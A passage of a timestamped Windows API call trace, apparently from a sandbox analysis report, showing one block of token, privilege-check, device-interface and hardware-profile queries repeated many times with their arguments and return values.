DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.862] SetLastError (dwErrCode=0x522) [0084.862] CloseHandle (hObject=0x114) returned 1 [0084.862] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.862] GetLastError () returned 0x578 [0084.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.862] GetCurrentThread () returned 0xfffffffe [0084.862] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.862] GetLastError () returned 0x3f0 [0084.862] GetCurrentProcess () returned 0xffffffff [0084.862] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.862] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.862] SetLastError (dwErrCode=0x522) [0084.862] CloseHandle (hObject=0x114) returned 1 [0084.862] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.862] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.862] GetLastError () returned 0x578 [0084.862] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.862] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.863] GetCurrentThread () returned 0xfffffffe [0084.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.863] GetLastError () returned 0x3f0 [0084.863] GetCurrentProcess () returned 0xffffffff [0084.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.863] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.863] SetLastError (dwErrCode=0x522) [0084.863] CloseHandle (hObject=0x114) returned 1 [0084.863] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.863] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.863] GetLastError () returned 0x578 [0084.863] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.863] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.863] GetCurrentThread () returned 0xfffffffe [0084.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.863] GetLastError () returned 0x3f0 [0084.863] GetCurrentProcess () returned 0xffffffff [0084.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.863] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.863] SetLastError (dwErrCode=0x522) [0084.863] CloseHandle (hObject=0x114) returned 1 [0084.863] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.863] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.863] GetLastError () returned 0x578 [0084.863] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.863] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.863] GetCurrentThread () returned 0xfffffffe [0084.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.863] GetLastError () returned 0x3f0 [0084.863] GetCurrentProcess () returned 0xffffffff [0084.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.863] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.863] SetLastError (dwErrCode=0x522) [0084.863] CloseHandle (hObject=0x114) returned 1 [0084.863] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.863] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.863] GetLastError () returned 0x578 [0084.863] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.863] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.863] GetCurrentThread () returned 0xfffffffe [0084.863] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.863] GetLastError () returned 0x3f0 [0084.863] GetCurrentProcess () returned 0xffffffff [0084.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.863] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.864] SetLastError (dwErrCode=0x522) [0084.864] CloseHandle (hObject=0x114) returned 1 [0084.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.864] GetLastError () returned 0x578 [0084.864] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.864] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.864] GetCurrentThread () returned 0xfffffffe [0084.864] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.864] GetLastError () returned 0x3f0 [0084.864] GetCurrentProcess () returned 0xffffffff [0084.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.864] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.864] SetLastError (dwErrCode=0x522) [0084.864] CloseHandle (hObject=0x114) returned 1 [0084.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.864] GetLastError () returned 0x578 [0084.864] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.864] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.864] GetCurrentThread () returned 0xfffffffe [0084.864] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.864] GetLastError () returned 0x3f0 [0084.864] GetCurrentProcess () returned 0xffffffff [0084.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.864] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.864] SetLastError (dwErrCode=0x522) [0084.864] CloseHandle (hObject=0x114) returned 1 [0084.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.864] GetLastError () returned 0x578 [0084.864] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.864] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.864] GetCurrentThread () returned 0xfffffffe [0084.864] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.864] GetLastError () returned 0x3f0 [0084.864] GetCurrentProcess () returned 0xffffffff [0084.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.864] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.864] SetLastError (dwErrCode=0x522) [0084.864] CloseHandle (hObject=0x114) returned 1 [0084.864] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.864] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.865] GetLastError () returned 0x578 [0084.865] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.865] GetCurrentThread () returned 0xfffffffe [0084.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.865] GetLastError () returned 0x3f0 [0084.865] GetCurrentProcess () returned 0xffffffff [0084.865] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.865] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.865] SetLastError (dwErrCode=0x522) [0084.865] CloseHandle (hObject=0x114) returned 1 [0084.865] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.865] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.865] GetLastError () returned 0x578 [0084.865] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.865] GetCurrentThread () returned 0xfffffffe [0084.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.865] GetLastError () returned 0x3f0 [0084.865] GetCurrentProcess () returned 0xffffffff [0084.865] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.865] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.865] SetLastError (dwErrCode=0x522) [0084.865] CloseHandle (hObject=0x114) returned 1 [0084.865] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.865] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.865] GetLastError () returned 0x578 [0084.865] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.865] GetCurrentThread () returned 0xfffffffe [0084.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.865] GetLastError () returned 0x3f0 [0084.865] GetCurrentProcess () returned 0xffffffff [0084.865] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.865] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.865] SetLastError (dwErrCode=0x522) [0084.865] CloseHandle (hObject=0x114) returned 1 [0084.865] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.865] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.865] GetLastError () returned 0x578 [0084.865] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.865] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.865] GetCurrentThread () returned 0xfffffffe [0084.865] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.866] GetLastError () returned 0x3f0 [0084.866] GetCurrentProcess () returned 0xffffffff [0084.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.866] SetLastError (dwErrCode=0x522) [0084.866] CloseHandle (hObject=0x114) returned 1 [0084.866] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.866] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.866] GetLastError () returned 0x578 [0084.866] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.866] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.866] GetCurrentThread () returned 0xfffffffe [0084.866] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.866] GetLastError () returned 0x3f0 [0084.866] GetCurrentProcess () returned 0xffffffff [0084.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.866] SetLastError (dwErrCode=0x522) [0084.866] CloseHandle (hObject=0x114) returned 1 [0084.866] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.866] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.866] GetLastError () returned 0x578 [0084.866] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.866] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.866] GetCurrentThread () returned 0xfffffffe [0084.866] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.866] GetLastError () returned 0x3f0 [0084.866] GetCurrentProcess () returned 0xffffffff [0084.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.866] SetLastError (dwErrCode=0x522) [0084.866] CloseHandle (hObject=0x114) returned 1 [0084.866] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.866] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.866] GetLastError () returned 0x578 [0084.866] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.866] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.866] GetCurrentThread () returned 0xfffffffe [0084.866] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.866] GetLastError () returned 0x3f0 [0084.866] GetCurrentProcess () returned 0xffffffff [0084.866] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.866] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.866] SetLastError (dwErrCode=0x522) [0084.866] CloseHandle (hObject=0x114) returned 1 [0084.866] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.866] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.867] GetLastError () returned 0x578 [0084.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.867] GetCurrentThread () returned 0xfffffffe [0084.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.867] GetLastError () returned 0x3f0 [0084.867] GetCurrentProcess () returned 0xffffffff [0084.867] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.867] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.867] SetLastError (dwErrCode=0x522) [0084.867] CloseHandle (hObject=0x114) returned 1 [0084.867] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.867] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.867] GetLastError () returned 0x578 [0084.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.867] GetCurrentThread () returned 0xfffffffe [0084.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.867] GetLastError () returned 0x3f0 [0084.867] GetCurrentProcess () returned 0xffffffff [0084.867] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.867] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.867] SetLastError (dwErrCode=0x522) [0084.867] CloseHandle (hObject=0x114) returned 1 [0084.867] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.867] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.867] GetLastError () returned 0x578 [0084.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.867] GetCurrentThread () returned 0xfffffffe [0084.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.867] GetLastError () returned 0x3f0 [0084.867] GetCurrentProcess () returned 0xffffffff [0084.867] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.867] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.867] SetLastError (dwErrCode=0x522) [0084.867] CloseHandle (hObject=0x114) returned 1 [0084.867] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.867] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.867] GetLastError () returned 0x578 [0084.867] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.867] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.867] GetCurrentThread () returned 0xfffffffe [0084.867] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.867] GetLastError () returned 0x3f0 [0084.867] GetCurrentProcess () returned 0xffffffff [0084.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.868] SetLastError (dwErrCode=0x522) [0084.868] CloseHandle (hObject=0x114) returned 1 [0084.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.868] GetLastError () returned 0x578 [0084.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.868] GetCurrentThread () returned 0xfffffffe [0084.868] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.868] GetLastError () returned 0x3f0 [0084.868] GetCurrentProcess () returned 0xffffffff [0084.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.868] SetLastError (dwErrCode=0x522) [0084.868] CloseHandle (hObject=0x114) returned 1 [0084.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.868] GetLastError () returned 0x578 [0084.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.868] GetCurrentThread () returned 0xfffffffe [0084.868] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.868] GetLastError () returned 0x3f0 [0084.868] GetCurrentProcess () returned 0xffffffff [0084.868] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.868] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.868] SetLastError (dwErrCode=0x522) [0084.868] CloseHandle (hObject=0x114) returned 1 [0084.868] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.868] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.868] GetLastError () returned 0x578 [0084.868] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.868] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.868] GetCurrentThread () returned 0xfffffffe [0084.868] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.868] GetLastError () returned 0x3f0 [0084.868] GetCurrentProcess () returned 0xffffffff 